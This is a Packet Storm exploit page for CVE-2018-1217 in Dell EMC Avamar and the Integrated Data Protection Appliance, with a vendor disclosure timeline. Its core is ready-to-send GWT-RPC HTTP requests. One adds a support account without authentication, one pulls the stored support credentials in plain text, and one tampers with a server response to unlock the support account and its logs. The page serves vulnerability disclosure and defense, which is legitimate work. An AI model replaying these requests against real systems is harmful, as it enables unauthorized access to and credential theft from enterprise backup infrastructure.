what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Dell EMC Avamar And Integrated Data Protection Appliance Invalid Access Control

Dell EMC Avamar And Integrated Data Protection Appliance Invalid Access Control
Posted Apr 10, 2018
Authored by SlidingWindow

DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction.

tags | exploit, remote
advisories | CVE-2018-1217
SHA-256 | 42f6942fd19142aaa2470d8266c6f9ada3b65f0227f43fd6c4a0fce736e249c1

Dell EMC Avamar And Integrated Data Protection Appliance Invalid Access Control

Change Mirror Download
# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)]
# Date: [24/11/2017]
# Exploit Author: [SlidingWindow]
# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition]
# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1]
# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183]
# CVE : [CVE-2018-1217]

==================
#Product:-
==================
EMC Avamar Virtual Edition is great for enterprise backup data protection for small and medium sized offices. EMC Avamar Virtual Edition is optimized for backup and recovery of virtual and physical servers,enterprise applications,remote offices,and desktops or laptops.

==================
#Vulnerability:-
==================
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)

========================
#Vulnerability Details:-
========================

=====================================================================================================================================================
1. Missing functional level access control allows an unauthenticated user to add DELL EMC Support Account to the Installation Manager (CVE-2018-1217)
=====================================================================================================================================================

DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction.

#Proof-Of-Concept:
------------------
1. Send following request to the target:

POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 8EGHBE4312AFBC12325324123DF4545A
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 452
Connection: close

7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611|<target_ip>|{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|

2. Log into Avamar Installation Manager and navigate to Configuration tab to make sure that the user 'hacker' was added successfully.


=========================================================================================================================================================
2. Missing functional level access control allows an unauthenticated user to retrieve DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217)
=========================================================================================================================================================

DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could retrieve Online Support Account password in plain text.

#Proof-Of-Concept:
------------------
1. Send following request to the target:

POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
DNT: 1
Content-Length: 192


7|0|6|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|<target_ip>|1|2|3|4|2|5|5|6|0|

2. Server returns credentials in plain text:

HTTP/1.1 200 OK
Date: Fri, 17 Nov 2017 10:46:31 GMT
Server: Jetty(9.0.6.v20130930)
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 275
Connection: close

//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"hacker\",\"emcsupportPassword\":\"hacked3\",\"disableLDLS\":false}"],0,7]


=========================================================================================================================================================
3. Improper validation of A<<DELL EMC Customer Support passcodeA allows an authenticated user to unlock DELL EMC Support Account and download verbose logs
=========================================================================================================================================================

DELL EMC Avamar fails to validate A<<DELL EMC Customer Support passcodeA properly allowing an authenticated user to unlock the support account and view/download verbose logs. However, according to vendor, this one seems to be a vulnerability but it's an ambuious functionality instead.

#Proof-Of-Concept:
------------------
1. Try to unlock the support account with an invalid password and you get error 'Customer Support Access Denied':
2. Now send the same request again (with invalid password) and tamper the server response:

Request:
---------
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 202
Cookie: supo=x; JSESSIONID=9tt4unkdjjilbo072x4nji2y
Connection: close

7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611|<target_ip>|1|2|3|4|3|5|5|5|6|0|7|


Tampered response:
--------------------
HTTP/1.1 200 OK
Date: Fri, 24Nov 2017 07:57:25 GMT
Server: Jetty(9.0.6.v20130930)
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 21
Connection: close

//OK[1,["true"],0,7]

3. This unlocks the support account and enabled the 'Log' download button.


===================================
#Vulnerability Disclosure Timeline:
===================================

11/2017: First email to disclose the vulnerability to EMC Security Response Team.
12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3 stating that this is an ambigious functionaliy and not a vulnerability.
12/2017: Vendor confirmed that the fix will be released in January 2018.
01/2018: Vendor delayed the fix release stating that the Dell EMC IDPA is also vulnerable.0
04/2018: Vendor assigned CVE-2018-1217 and pubished the advisory 'DSA-2018-025: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability': http://seclists.org/fulldisclosure/2018/Apr/14


Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close